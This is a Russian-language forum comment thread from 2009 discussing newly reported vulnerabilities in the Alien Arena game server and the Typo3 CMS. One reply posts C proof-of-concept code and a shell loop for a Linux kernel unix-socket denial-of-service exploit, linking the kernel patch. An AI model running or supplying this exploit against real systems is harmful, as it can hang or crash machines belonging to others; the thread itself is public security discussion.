1.1, NicK (?), 22:47, 24/10/2009 [ответить]
| +/– |
А что сервер Alien Arena выполняется с правами root?
| |
|
2.3, anonymouse (?), 23:27, 24/10/2009 [^] [^^] [^^^] [ответить]
| +/– |
> А что сервер Alien Arena выполняется с правами root?
А что левый код у вас может выполнятся под учётной записью?
| |
2.5, XoRe (ok), 00:49, 25/10/2009 [^] [^^] [^^^] [ответить]
| +/– |
>А что сервер Alien Arena выполняется с правами root?
Думаю, как настроят, так и выполняется.
А настраивают по разному...)
| |
|
3.7, Zenitur (?), 03:11, 26/10/2009 [^] [^^] [^^^] [ответить]
| +/– |
Если человек создаст сервер на FreeBSD или Linux, который будет круглосуточно заниматься только Alien Arena, то да - вполне возможно, что сервер запустится от root.
| |
|
|
1.2, User294 (ok), 23:08, 24/10/2009 [ответить]
| +/– |
> В системе управления web-контентом Typo3 найдено 7 уязвимостей,
А кто-то мне говорил что он безопасный... но как видим нет в мире совершенства.
| |
|
2.8, Moosh (?), 15:56, 26/10/2009 [^] [^^] [^^^] [ответить]
| +/– |
Тупо3 и безопасный? Оксюморон!
Вместо чем верить кому-то, стоило просто посмотреть security advisory.
| |
|
1.6, pavlinux (ok), 19:35, 25/10/2009 [ответить]
| +/– |
> Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности.
------------
int main(void) {
int ret, csd, lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}
-----
You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).
http://patchwork.kernel.org/patch/54678/
| |
|